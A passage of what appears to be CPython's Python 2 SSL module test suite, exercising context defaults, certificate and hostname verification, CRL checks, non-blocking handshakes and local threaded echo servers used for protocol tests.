ctx = ssl.create_default_context(ssl.Purpose.CLIENT_AUTH)
self.assertEqual(ctx.protocol, ssl.PROTOCOL_SSLv23)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
self.assertEqual(ctx.options & ssl.OP_NO_SSLv2, ssl.OP_NO_SSLv2)
self.assertEqual(
ctx.options & getattr(ssl, "OP_NO_COMPRESSION", 0),
getattr(ssl, "OP_NO_COMPRESSION", 0),
)
self.assertEqual(
ctx.options & getattr(ssl, "OP_SINGLE_DH_USE", 0),
getattr(ssl, "OP_SINGLE_DH_USE", 0),
)
self.assertEqual(
ctx.options & getattr(ssl, "OP_SINGLE_ECDH_USE", 0),
getattr(ssl, "OP_SINGLE_ECDH_USE", 0),
)
def test__create_stdlib_context(self):
ctx = ssl._create_stdlib_context()
self.assertEqual(ctx.protocol, ssl.PROTOCOL_SSLv23)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
self.assertFalse(ctx.check_hostname)
self.assertEqual(ctx.options & ssl.OP_NO_SSLv2, ssl.OP_NO_SSLv2)
ctx = ssl._create_stdlib_context(ssl.PROTOCOL_TLSv1)
self.assertEqual(ctx.protocol, ssl.PROTOCOL_TLSv1)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
self.assertEqual(ctx.options & ssl.OP_NO_SSLv2, ssl.OP_NO_SSLv2)
ctx = ssl._create_stdlib_context(ssl.PROTOCOL_TLSv1,
cert_reqs=ssl.CERT_REQUIRED,
check_hostname=True)
self.assertEqual(ctx.protocol, ssl.PROTOCOL_TLSv1)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
self.assertTrue(ctx.check_hostname)
self.assertEqual(ctx.options & ssl.OP_NO_SSLv2, ssl.OP_NO_SSLv2)
ctx = ssl._create_stdlib_context(purpose=ssl.Purpose.CLIENT_AUTH)
self.assertEqual(ctx.protocol, ssl.PROTOCOL_SSLv23)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
self.assertEqual(ctx.options & ssl.OP_NO_SSLv2, ssl.OP_NO_SSLv2)
def test__https_verify_certificates(self):
# Unit test to check the contect factory mapping
# The factories themselves are tested above
# This test will fail by design if run under PYTHONHTTPSVERIFY=0
# (as will various test_httplib tests)
# Uses a fresh SSL module to avoid affecting the real one
local_ssl = support.import_fresh_module("ssl")
# Certificate verification is enabled by default
self.assertIs(local_ssl._create_default_https_context,
local_ssl.create_default_context)
# Turn default verification off
local_ssl._https_verify_certificates(enable=False)
self.assertIs(local_ssl._create_default_https_context,
local_ssl._create_unverified_context)
# And back on
local_ssl._https_verify_certificates(enable=True)
self.assertIs(local_ssl._create_default_https_context,
local_ssl.create_default_context)
# The default behaviour is to enable
local_ssl._https_verify_certificates(enable=False)
local_ssl._https_verify_certificates()
self.assertIs(local_ssl._create_default_https_context,
local_ssl.create_default_context)
def test__https_verify_envvar(self):
# Unit test to check the PYTHONHTTPSVERIFY handling
# Need to use a subprocess so it can still be run under -E
https_is_verified = """import ssl, sys; \
status = "Error: _create_default_https_context does not verify certs" \
if ssl._create_default_https_context is \
ssl._create_unverified_context \
else None; \
sys.exit(status)"""
https_is_not_verified = """import ssl, sys; \
status = "Error: _create_default_https_context verifies certs" \
if ssl._create_default_https_context is \
ssl.create_default_context \
else None; \
sys.exit(status)"""
extra_env = {}
# Omitting it leaves verification on
assert_python_ok("-c", https_is_verified, **extra_env)
# Setting it to zero turns verification off
extra_env[ssl._https_verify_envvar] = "0"
assert_python_ok("-c", https_is_not_verified, **extra_env)
# Any other value should also leave it on
for setting in ("", "1", "enabled", "foo"):
extra_env[ssl._https_verify_envvar] = setting
assert_python_ok("-c", https_is_verified, **extra_env)
def test_check_hostname(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
self.assertFalse(ctx.check_hostname)
# Requires CERT_REQUIRED or CERT_OPTIONAL
with self.assertRaises(ValueError):
ctx.check_hostname = True
ctx.verify_mode = ssl.CERT_REQUIRED
self.assertFalse(ctx.check_hostname)
ctx.check_hostname = True
self.assertTrue(ctx.check_hostname)
ctx.verify_mode = ssl.CERT_OPTIONAL
ctx.check_hostname = True
self.assertTrue(ctx.check_hostname)
# Cannot set CERT_NONE with check_hostname enabled
with self.assertRaises(ValueError):
ctx.verify_mode = ssl.CERT_NONE
ctx.check_hostname = False
self.assertFalse(ctx.check_hostname)
class SSLErrorTests(unittest.TestCase):
def test_str(self):
# The str() of a SSLError doesn't include the errno
e = ssl.SSLError(1, "foo")
self.assertEqual(str(e), "foo")
self.assertEqual(e.errno, 1)
# Same for a subclass
e = ssl.SSLZeroReturnError(1, "foo")
self.assertEqual(str(e), "foo")
self.assertEqual(e.errno, 1)
def test_lib_reason(self):
# Test the library and reason attributes
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
with self.assertRaises(ssl.SSLError) as cm:
ctx.load_dh_params(CERTFILE)
self.assertEqual(cm.exception.library, 'PEM')
self.assertEqual(cm.exception.reason, 'NO_START_LINE')
s = str(cm.exception)
self.assertTrue(s.startswith("[PEM: NO_START_LINE] no start line"), s)
def test_subclass(self):
# Check that the appropriate SSLError subclass is raised
# (this only tests one of them)
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
with closing(socket.socket()) as s:
s.bind(("127.0.0.1", 0))
s.listen(5)
c = socket.socket()
c.connect(s.getsockname())
c.setblocking(False)
with closing(ctx.wrap_socket(c, False, do_handshake_on_connect=False)) as c:
with self.assertRaises(ssl.SSLWantReadError) as cm:
c.do_handshake()
s = str(cm.exception)
self.assertTrue(s.startswith("The operation did not complete (read)"), s)
# For compatibility
self.assertEqual(cm.exception.errno, ssl.SSL_ERROR_WANT_READ)
class NetworkedTests(unittest.TestCase):
def test_connect(self):
with support.transient_internet(REMOTE_HOST):
s = ssl.wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_NONE)
try:
s.connect((REMOTE_HOST, 443))
self.assertEqual({}, s.getpeercert())
finally:
s.close()
# this should fail because we have no verification certs
s = ssl.wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED)
self.assertRaisesRegexp(ssl.SSLError, "certificate verify failed",
s.connect, (REMOTE_HOST, 443))
s.close()
# this should succeed because we specify the root cert
s = ssl.wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED,
ca_certs=REMOTE_ROOT_CERT)
try:
s.connect((REMOTE_HOST, 443))
self.assertTrue(s.getpeercert())
finally:
s.close()
def test_connect_ex(self):
# Issue #11326: check connect_ex() implementation
with support.transient_internet(REMOTE_HOST):
s = ssl.wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED,
ca_certs=REMOTE_ROOT_CERT)
try:
self.assertEqual(0, s.connect_ex((REMOTE_HOST, 443)))
self.assertTrue(s.getpeercert())
finally:
s.close()
def test_non_blocking_connect_ex(self):
# Issue #11326: non-blocking connect_ex() should allow handshake
# to proceed after the socket gets ready.
with support.transient_internet(REMOTE_HOST):
s = ssl.wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED,
ca_certs=REMOTE_ROOT_CERT,
do_handshake_on_connect=False)
try:
s.setblocking(False)
rc = s.connect_ex((REMOTE_HOST, 443))
# EWOULDBLOCK under Windows, EINPROGRESS elsewhere
self.assertIn(rc, (0, errno.EINPROGRESS, errno.EWOULDBLOCK))
# Wait for connect to finish
select.select([], [s], [], 5.0)
# Non-blocking handshake
while True:
try:
s.do_handshake()
break
except ssl.SSLWantReadError:
select.select([s], [], [], 5.0)
except ssl.SSLWantWriteError:
select.select([], [s], [], 5.0)
# SSL established
self.assertTrue(s.getpeercert())
finally:
s.close()
def test_timeout_connect_ex(self):
# Issue #12065: on a timeout, connect_ex() should return the original
# errno (mimicking the behaviour of non-SSL sockets).
with support.transient_internet(REMOTE_HOST):
s = ssl.wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED,
ca_certs=REMOTE_ROOT_CERT,
do_handshake_on_connect=False)
try:
s.settimeout(0.0000001)
rc = s.connect_ex((REMOTE_HOST, 443))
if rc == 0:
self.skipTest("REMOTE_HOST responded too quickly")
self.assertIn(rc, (errno.EAGAIN, errno.EWOULDBLOCK))
finally:
s.close()
def test_connect_ex_error(self):
with support.transient_internet(REMOTE_HOST):
s = ssl.wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED,
ca_certs=REMOTE_ROOT_CERT)
try:
rc = s.connect_ex((REMOTE_HOST, 444))
# Issue #19919: Windows machines or VMs hosted on Windows
# machines sometimes return EWOULDBLOCK.
errors = (
errno.ECONNREFUSED, errno.EHOSTUNREACH, errno.ETIMEDOUT,
errno.EWOULDBLOCK,
)
self.assertIn(rc, errors)
finally:
s.close()
def test_connect_with_context(self):
with support.transient_internet(REMOTE_HOST):
# Same as test_connect, but with a separately created context
ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
s = ctx.wrap_socket(socket.socket(socket.AF_INET))
s.connect((REMOTE_HOST, 443))
try:
self.assertEqual({}, s.getpeercert())
finally:
s.close()
# Same with a server hostname
s = ctx.wrap_socket(socket.socket(socket.AF_INET),
server_hostname=REMOTE_HOST)
s.connect((REMOTE_HOST, 443))
s.close()
# This should fail because we have no verification certs
ctx.verify_mode = ssl.CERT_REQUIRED
s = ctx.wrap_socket(socket.socket(socket.AF_INET))
self.assertRaisesRegexp(ssl.SSLError, "certificate verify failed",
s.connect, (REMOTE_HOST, 443))
s.close()
# This should succeed because we specify the root cert
ctx.load_verify_locations(REMOTE_ROOT_CERT)
s = ctx.wrap_socket(socket.socket(socket.AF_INET))
s.connect((REMOTE_HOST, 443))
try:
cert = s.getpeercert()
self.assertTrue(cert)
finally:
s.close()
def test_connect_capath(self):
# Verify server certificates using the `capath` argument
# NOTE: the subject hashing algorithm has been changed between
# OpenSSL 0.9.8n and 1.0.0, as a result the capath directory must
# contain both versions of each certificate (same content, different
# filename) for this test to be portable across OpenSSL releases.
with support.transient_internet(REMOTE_HOST):
ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
ctx.verify_mode = ssl.CERT_REQUIRED
ctx.load_verify_locations(capath=CAPATH)
s = ctx.wrap_socket(socket.socket(socket.AF_INET))
s.connect((REMOTE_HOST, 443))
try:
cert = s.getpeercert()
self.assertTrue(cert)
finally:
s.close()
# Same with a bytes `capath` argument
ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
ctx.verify_mode = ssl.CERT_REQUIRED
ctx.load_verify_locations(capath=BYTES_CAPATH)
s = ctx.wrap_socket(socket.socket(socket.AF_INET))
s.connect((REMOTE_HOST, 443))
try:
cert = s.getpeercert()
self.assertTrue(cert)
finally:
s.close()
def test_connect_cadata(self):
with open(REMOTE_ROOT_CERT) as f:
pem = f.read().decode('ascii')
der = ssl.PEM_cert_to_DER_cert(pem)
with support.transient_internet(REMOTE_HOST):
ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
ctx.verify_mode = ssl.CERT_REQUIRED
ctx.load_verify_locations(cadata=pem)
with closing(ctx.wrap_socket(socket.socket(socket.AF_INET))) as s:
s.connect((REMOTE_HOST, 443))
cert = s.getpeercert()
self.assertTrue(cert)
# same with DER
ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
ctx.verify_mode = ssl.CERT_REQUIRED
ctx.load_verify_locations(cadata=der)
with closing(ctx.wrap_socket(socket.socket(socket.AF_INET))) as s:
s.connect((REMOTE_HOST, 443))
cert = s.getpeercert()
self.assertTrue(cert)
@unittest.skipIf(os.name == "nt", "Can't use a socket as a file under Windows")
def test_makefile_close(self):
# Issue #5238: creating a file-like object with makefile() shouldn't
# delay closing the underlying "real socket" (here tested with its
# file descriptor, hence skipping the test under Windows).
with support.transient_internet(REMOTE_HOST):
ss = ssl.wrap_socket(socket.socket(socket.AF_INET))
ss.connect((REMOTE_HOST, 443))
fd = ss.fileno()
f = ss.makefile()
f.close()
# The fd is still open
os.read(fd, 0)
# Closing the SSL socket should close the fd too
ss.close()
gc.collect()
with self.assertRaises(OSError) as e:
os.read(fd, 0)
self.assertEqual(e.exception.errno, errno.EBADF)
def test_non_blocking_handshake(self):
with support.transient_internet(REMOTE_HOST):
s = socket.socket(socket.AF_INET)
s.connect((REMOTE_HOST, 443))
s.setblocking(False)
s = ssl.wrap_socket(s,
cert_reqs=ssl.CERT_NONE,
do_handshake_on_connect=False)
count = 0
while True:
try:
count += 1
s.do_handshake()
break
except ssl.SSLWantReadError:
select.select([s], [], [])
except ssl.SSLWantWriteError:
select.select([], [s], [])
s.close()
if support.verbose:
sys.stdout.write("\nNeeded %d calls to do_handshake() to establish session.\n" % count)
def test_get_server_certificate(self):
def _test_get_server_certificate(host, port, cert=None):
with support.transient_internet(host):
pem = ssl.get_server_certificate((host, port))
if not pem:
self.fail("No server certificate on %s:%s!" % (host, port))
try:
pem = ssl.get_server_certificate((host, port),
ca_certs=CERTFILE)
except ssl.SSLError as x:
#should fail
if support.verbose:
sys.stdout.write("%s\n" % x)
else:
self.fail("Got server certificate %s for %s:%s!" % (pem, host, port))
pem = ssl.get_server_certificate((host, port),
ca_certs=cert)
if not pem:
self.fail("No server certificate on %s:%s!" % (host, port))
if support.verbose:
sys.stdout.write("\nVerified certificate for %s:%s is\n%s\n" % (host, port ,pem))
_test_get_server_certificate(REMOTE_HOST, 443, REMOTE_ROOT_CERT)
if support.IPV6_ENABLED:
_test_get_server_certificate('ipv6.google.com', 443)
def test_ciphers(self):
remote = (REMOTE_HOST, 443)
with support.transient_internet(remote[0]):
with closing(ssl.wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_NONE, ciphers="ALL")) as s:
s.connect(remote)
with closing(ssl.wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_NONE, ciphers="DEFAULT")) as s:
s.connect(remote)
# Error checking can happen at instantiation or when connecting
with self.assertRaisesRegexp(ssl.SSLError, "No cipher can be selected"):
with closing(socket.socket(socket.AF_INET)) as sock:
s = ssl.wrap_socket(sock,
cert_reqs=ssl.CERT_NONE, ciphers="^$:,;?*'dorothyx")
s.connect(remote)
def test_get_ca_certs_capath(self):
# capath certs are loaded on request
with support.transient_internet(REMOTE_HOST):
ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
ctx.verify_mode = ssl.CERT_REQUIRED
ctx.load_verify_locations(capath=CAPATH)
self.assertEqual(ctx.get_ca_certs(), [])
s = ctx.wrap_socket(socket.socket(socket.AF_INET))
s.connect((REMOTE_HOST, 443))
try:
cert = s.getpeercert()
self.assertTrue(cert)
finally:
s.close()
self.assertEqual(len(ctx.get_ca_certs()), 1)
@needs_sni
def test_context_setget(self):
# Check that the context of a connected socket can be replaced.
with support.transient_internet(REMOTE_HOST):
ctx1 = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx2 = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
s = socket.socket(socket.AF_INET)
with closing(ctx1.wrap_socket(s)) as ss:
ss.connect((REMOTE_HOST, 443))
self.assertIs(ss.context, ctx1)
self.assertIs(ss._sslobj.context, ctx1)
ss.context = ctx2
self.assertIs(ss.context, ctx2)
self.assertIs(ss._sslobj.context, ctx2)
try:
import threading
except ImportError:
_have_threads = False
else:
_have_threads = True
from test.ssl_servers import make_https_server
class ThreadedEchoServer(threading.Thread):
class ConnectionHandler(threading.Thread):
"""A mildly complicated class, because we want it to work both
with and without the SSL wrapper around the socket connection, so
that we can test the STARTTLS functionality."""
def __init__(self, server, connsock, addr):
self.server = server
self.running = False
self.sock = connsock
self.addr = addr
self.sock.setblocking(1)
self.sslconn = None
threading.Thread.__init__(self)
self.daemon = True
def wrap_conn(self):
try:
self.sslconn = self.server.context.wrap_socket(
self.sock, server_side=True)
self.server.selected_npn_protocols.append(self.sslconn.selected_npn_protocol())
self.server.selected_alpn_protocols.append(self.sslconn.selected_alpn_protocol())
except socket.error as e:
# We treat ConnectionResetError as though it were an
# SSLError - OpenSSL on Ubuntu abruptly closes the
# connection when asked to use an unsupported protocol.
#
# XXX Various errors can have happened here, for example
# a mismatching protocol version, an invalid certificate,
# or a low-level bug. This should be made more discriminating.
if not isinstance(e, ssl.SSLError) and e.errno != errno.ECONNRESET:
raise
self.server.conn_errors.append(e)
if self.server.chatty:
handle_error("\n server: bad connection attempt from " + repr(self.addr) + ":\n")
self.running = False
self.server.stop()
self.close()
return False
else:
if self.server.context.verify_mode == ssl.CERT_REQUIRED:
cert = self.sslconn.getpeercert()
if support.verbose and self.server.chatty:
sys.stdout.write(" client cert is " + pprint.pformat(cert) + "\n")
cert_binary = self.sslconn.getpeercert(True)
if support.verbose and self.server.chatty:
sys.stdout.write(" cert binary is " + str(len(cert_binary)) + " bytes\n")
cipher = self.sslconn.cipher()
if support.verbose and self.server.chatty:
sys.stdout.write(" server: connection cipher is now " + str(cipher) + "\n")
sys.stdout.write(" server: selected protocol is now "
+ str(self.sslconn.selected_npn_protocol()) + "\n")
return True
def read(self):
if self.sslconn:
return self.sslconn.read()
else:
return self.sock.recv(1024)
def write(self, bytes):
if self.sslconn:
return self.sslconn.write(bytes)
else:
return self.sock.send(bytes)
def close(self):
if self.sslconn:
self.sslconn.close()
else:
self.sock.close()
def run(self):
self.running = True
if not self.server.starttls_server:
if not self.wrap_conn():
return
while self.running:
try:
msg = self.read()
stripped = msg.strip()
if not stripped:
# eof, so quit this handler
self.running = False
self.close()
elif stripped == b'over':
if support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: client closed connection\n")
self.close()
return
elif (self.server.starttls_server and
stripped == b'STARTTLS'):
if support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: read STARTTLS from client, sending OK...\n")
self.write(b"OK\n")
if not self.wrap_conn():
return
elif (self.server.starttls_server and self.sslconn
and stripped == b'ENDTLS'):
if support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: read ENDTLS from client, sending OK...\n")
self.write(b"OK\n")
self.sock = self.sslconn.unwrap()
self.sslconn = None
if support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: connection is now unencrypted...\n")
elif stripped == b'CB tls-unique':
if support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: read CB tls-unique from client, sending our CB data...\n")
data = self.sslconn.get_channel_binding("tls-unique")
self.write(repr(data).encode("us-ascii") + b"\n")
else:
if (support.verbose and
self.server.connectionchatty):
ctype = (self.sslconn and "encrypted") or "unencrypted"
sys.stdout.write(" server: read %r (%s), sending back %r (%s)...\n"
% (msg, ctype, msg.lower(), ctype))
self.write(msg.lower())
except ssl.SSLError:
if self.server.chatty:
handle_error("Test server failure:\n")
self.close()
self.running = False
# normally, we'd just stop here, but for the test
# harness, we want to stop the server
self.server.stop()
def __init__(self, certificate=None, ssl_version=None,
certreqs=None, cacerts=None,
chatty=True, connectionchatty=False, starttls_server=False,
npn_protocols=None, alpn_protocols=None,
ciphers=None, context=None):
if context:
self.context = context
else:
self.context = ssl.SSLContext(ssl_version
if ssl_version is not None
else ssl.PROTOCOL_TLS)
self.context.verify_mode = (certreqs if certreqs is not None
else ssl.CERT_NONE)
if cacerts:
self.context.load_verify_locations(cacerts)
if certificate:
self.context.load_cert_chain(certificate)
if npn_protocols:
self.context.set_npn_protocols(npn_protocols)
if alpn_protocols:
self.context.set_alpn_protocols(alpn_protocols)
if ciphers:
self.context.set_ciphers(ciphers)
self.chatty = chatty
self.connectionchatty = connectionchatty
self.starttls_server = starttls_server
self.sock = socket.socket()
self.port = support.bind_port(self.sock)
self.flag = None
self.active = False
self.selected_npn_protocols = []
self.selected_alpn_protocols = []
self.conn_errors = []
threading.Thread.__init__(self)
self.daemon = True
def __enter__(self):
self.start(threading.Event())
self.flag.wait()
return self
def __exit__(self, *args):
self.stop()
self.join()
def start(self, flag=None):
self.flag = flag
threading.Thread.start(self)
def run(self):
self.sock.settimeout(0.05)
self.sock.listen(5)
self.active = True
if self.flag:
# signal an event
self.flag.set()
while self.active:
try:
newconn, connaddr = self.sock.accept()
if support.verbose and self.chatty:
sys.stdout.write(' server: new connection from '
+ repr(connaddr) + '\n')
handler = self.ConnectionHandler(self, newconn, connaddr)
handler.start()
handler.join()
except socket.timeout:
pass
except KeyboardInterrupt:
self.stop()
self.sock.close()
def stop(self):
self.active = False
class AsyncoreEchoServer(threading.Thread):
class EchoServer(asyncore.dispatcher):
class ConnectionHandler(asyncore.dispatcher_with_send):
def __init__(self, conn, certfile):
self.socket = ssl.wrap_socket(conn, server_side=True,
certfile=certfile,
do_handshake_on_connect=False)
asyncore.dispatcher_with_send.__init__(self, self.socket)
self._ssl_accepting = True
self._do_ssl_handshake()
def readable(self):
if isinstance(self.socket, ssl.SSLSocket):
while self.socket.pending() > 0:
self.handle_read_event()
return True
def _do_ssl_handshake(self):
try:
self.socket.do_handshake()
except (ssl.SSLWantReadError, ssl.SSLWantWriteError):
return
except ssl.SSLEOFError:
return self.handle_close()
except ssl.SSLError:
raise
except socket.error, err:
if err.args[0] == errno.ECONNABORTED:
return self.handle_close()
else:
self._ssl_accepting = False
def handle_read(self):
if self._ssl_accepting:
self._do_ssl_handshake()
else:
data = self.recv(1024)
if support.verbose:
sys.stdout.write(" server: read %s from client\n" % repr(data))
if not data:
self.close()
else:
self.send(data.lower())
def handle_close(self):
self.close()
if support.verbose:
sys.stdout.write(" server: closed connection %s\n" % self.socket)
def handle_error(self):
raise
def __init__(self, certfile):
self.certfile = certfile
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.port = support.bind_port(sock, '')
asyncore.dispatcher.__init__(self, sock)
self.listen(5)
def handle_accept(self):
sock_obj, addr = self.accept()
if support.verbose:
sys.stdout.write(" server: new connection from %s:%s\n" %addr)
self.ConnectionHandler(sock_obj, self.certfile)
def handle_error(self):
raise
def __init__(self, certfile):
self.flag = None
self.active = False
self.server = self.EchoServer(certfile)
self.port = self.server.port
threading.Thread.__init__(self)
self.daemon = True
def __str__(self):
return "<%s %s>" % (self.__class__.__name__, self.server)
def __enter__(self):
self.start(threading.Event())
self.flag.wait()
return self
def __exit__(self, *args):
if support.verbose:
sys.stdout.write(" cleanup: stopping server.\n")
self.stop()
if support.verbose:
sys.stdout.write(" cleanup: joining server thread.\n")
self.join()
if support.verbose:
sys.stdout.write(" cleanup: successfully joined.\n")
# make sure that ConnectionHandler is removed from socket_map
asyncore.close_all(ignore_all=True)
def start(self, flag=None):
self.flag = flag
threading.Thread.start(self)
def run(self):
self.active = True
if self.flag:
self.flag.set()
while self.active:
try:
asyncore.loop(1)
except:
pass
def stop(self):
self.active = False
self.server.close()
def server_params_test(client_context, server_context, indata=b"FOO\n",
chatty=True, connectionchatty=False, sni_name=None):
"""
Launch a server, connect a client to it and try various reads
and writes.
"""
stats = {}
server = ThreadedEchoServer(context=server_context,
chatty=chatty,
connectionchatty=False)
with server:
with closing(client_context.wrap_socket(socket.socket(),
server_hostname=sni_name)) as s:
s.connect((HOST, server.port))
for arg in [indata, bytearray(indata), memoryview(indata)]:
if connectionchatty:
if support.verbose:
sys.stdout.write(
" client: sending %r...\n" % indata)
s.write(arg)
outdata = s.read()
if connectionchatty:
if support.verbose:
sys.stdout.write(" client: read %r\n" % outdata)
if outdata != indata.lower():
raise AssertionError(
"bad data <<%r>> (%d) received; expected <<%r>> (%d)\n"
% (outdata[:20], len(outdata),
indata[:20].lower(), len(indata)))
s.write(b"over\n")
if connectionchatty:
if support.verbose:
sys.stdout.write(" client: closing connection.\n")
stats.update({
'compression': s.compression(),
'cipher': s.cipher(),
'peercert': s.getpeercert(),
'client_alpn_protocol': s.selected_alpn_protocol(),
'client_npn_protocol': s.selected_npn_protocol(),
'version': s.version(),
})
s.close()
stats['server_alpn_protocols'] = server.selected_alpn_protocols
stats['server_npn_protocols'] = server.selected_npn_protocols
return stats
def try_protocol_combo(server_protocol, client_protocol, expect_success,
certsreqs=None, server_options=0, client_options=0):
"""
Try to SSL-connect using *client_protocol* to *server_protocol*.
If *expect_success* is true, assert that the connection succeeds,
if it's false, assert that the connection fails.
Also, if *expect_success* is a string, assert that it is the protocol
version actually used by the connection.
"""
if certsreqs is None:
certsreqs = ssl.CERT_NONE
certtype = {
ssl.CERT_NONE: "CERT_NONE",
ssl.CERT_OPTIONAL: "CERT_OPTIONAL",
ssl.CERT_REQUIRED: "CERT_REQUIRED",
}[certsreqs]
if support.verbose:
formatstr = (expect_success and " %s->%s %s\n") or " {%s->%s} %s\n"
sys.stdout.write(formatstr %
(ssl.get_protocol_name(client_protocol),
ssl.get_protocol_name(server_protocol),
certtype))
client_context = ssl.SSLContext(client_protocol)
client_context.options |= client_options
server_context = ssl.SSLContext(server_protocol)
server_context.options |= server_options
# NOTE: we must enable "ALL" ciphers on the client, otherwise an
# SSLv23 client will send an SSLv3 hello (rather than SSLv2)
# starting from OpenSSL 1.0.0 (see issue #8322).
if client_context.protocol == ssl.PROTOCOL_SSLv23:
client_context.set_ciphers("ALL")
for ctx in (client_context, server_context):
ctx.verify_mode = certsreqs
ctx.load_cert_chain(CERTFILE)
ctx.load_verify_locations(CERTFILE)
try:
stats = server_params_test(client_context, server_context,
chatty=False, connectionchatty=False)
# Protocol mismatch can result in either an SSLError, or a
# "Connection reset by peer" error.
except ssl.SSLError:
if expect_success:
raise
except socket.error as e:
if expect_success or e.errno != errno.ECONNRESET:
raise
else:
if not expect_success:
raise AssertionError(
"Client protocol %s succeeded with server protocol %s!"
% (ssl.get_protocol_name(client_protocol),
ssl.get_protocol_name(server_protocol)))
elif (expect_success is not True
and expect_success != stats['version']):
raise AssertionError("version mismatch: expected %r, got %r"
% (expect_success, stats['version']))
class ThreadedTests(unittest.TestCase):
@skip_if_broken_ubuntu_ssl
def test_echo(self):
"""Basic test of an SSL client connecting to a server"""
if support.verbose:
sys.stdout.write("\n")
for protocol in PROTOCOLS:
context = ssl.SSLContext(protocol)
context.load_cert_chain(CERTFILE)
server_params_test(context, context,
chatty=True, connectionchatty=True)
def test_getpeercert(self):
if support.verbose:
sys.stdout.write("\n")
context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
context.verify_mode = ssl.CERT_REQUIRED
context.load_verify_locations(CERTFILE)
context.load_cert_chain(CERTFILE)
server = ThreadedEchoServer(context=context, chatty=False)
with server:
s = context.wrap_socket(socket.socket(),
do_handshake_on_connect=False)
s.connect((HOST, server.port))
# getpeercert() raise ValueError while the handshake isn't
# done.
with self.assertRaises(ValueError):
s.getpeercert()
s.do_handshake()
cert = s.getpeercert()
self.assertTrue(cert, "Can't get peer certificate.")
cipher = s.cipher()
if support.verbose:
sys.stdout.write(pprint.pformat(cert) + '\n')
sys.stdout.write("Connection cipher is " + str(cipher) + '.\n')
if 'subject' not in cert:
self.fail("No subject field in certificate: %s." %
pprint.pformat(cert))
if ((('organizationName', 'Python Software Foundation'),)
not in cert['subject']):
self.fail(
"Missing or invalid 'organizationName' field in certificate subject; "
"should be 'Python Software Foundation'.")
self.assertIn('notBefore', cert)
self.assertIn('notAfter', cert)
before = ssl.cert_time_to_seconds(cert['notBefore'])
after = ssl.cert_time_to_seconds(cert['notAfter'])
self.assertLess(before, after)
s.close()
@unittest.skipUnless(have_verify_flags(),
"verify_flags need OpenSSL > 0.9.8")
def test_crl_check(self):
if support.verbose:
sys.stdout.write("\n")
server_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
server_context.load_cert_chain(SIGNED_CERTFILE)
context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
context.verify_mode = ssl.CERT_REQUIRED
context.load_verify_locations(SIGNING_CA)
tf = getattr(ssl, "VERIFY_X509_TRUSTED_FIRST", 0)
self.assertEqual(context.verify_flags, ssl.VERIFY_DEFAULT | tf)
# VERIFY_DEFAULT should pass
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with closing(context.wrap_socket(socket.socket())) as s:
s.connect((HOST, server.port))
cert = s.getpeercert()
self.assertTrue(cert, "Can't get peer certificate.")
# VERIFY_CRL_CHECK_LEAF without a loaded CRL file fails
context.verify_flags |= ssl.VERIFY_CRL_CHECK_LEAF
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with closing(context.wrap_socket(socket.socket())) as s:
with self.assertRaisesRegexp(ssl.SSLError,
"certificate verify failed"):
s.connect((HOST, server.port))
# now load a CRL file. The CRL file is signed by the CA.
context.load_verify_locations(CRLFILE)
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with closing(context.wrap_socket(socket.socket())) as s:
s.connect((HOST, server.port))
cert = s.getpeercert()
self.assertTrue(cert, "Can't get peer certificate.")
def test_check_hostname(self):
if support.verbose:
sys.stdout.write("\n")
server_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
server_context.load_cert_chain(SIGNED_CERTFILE)
context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
context.verify_mode = ssl.CERT_REQUIRED
context.check_hostname = True
context.load_verify_locations(SIGNING_CA)
# correct hostname should verify
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with closing(context.wrap_socket(socket.socket(),
server_hostname="localhost")) as s:
s.connect((HOST, server.port))
cert = s.getpeercert()
self.assertTrue(cert, "Can't get peer certificate.")
# incorrect hostname should raise an exception
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with closing(context.wrap_socket(socket.socket(),
server_hostname="invalid")) as s:
with self.assertRaisesRegexp(ssl.CertificateError,
"hostname 'invalid' doesn't match u?'localhost'"):
s.connect((HOST, server.port))
# missing server_hostname arg should cause an exception, too
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with closing(socket.socket()) as s:
with self.assertRaisesRegexp(ValueError,
"check_hostname requires server_hostname"):
context.wrap_socket(s)
def test_wrong_cert(self):
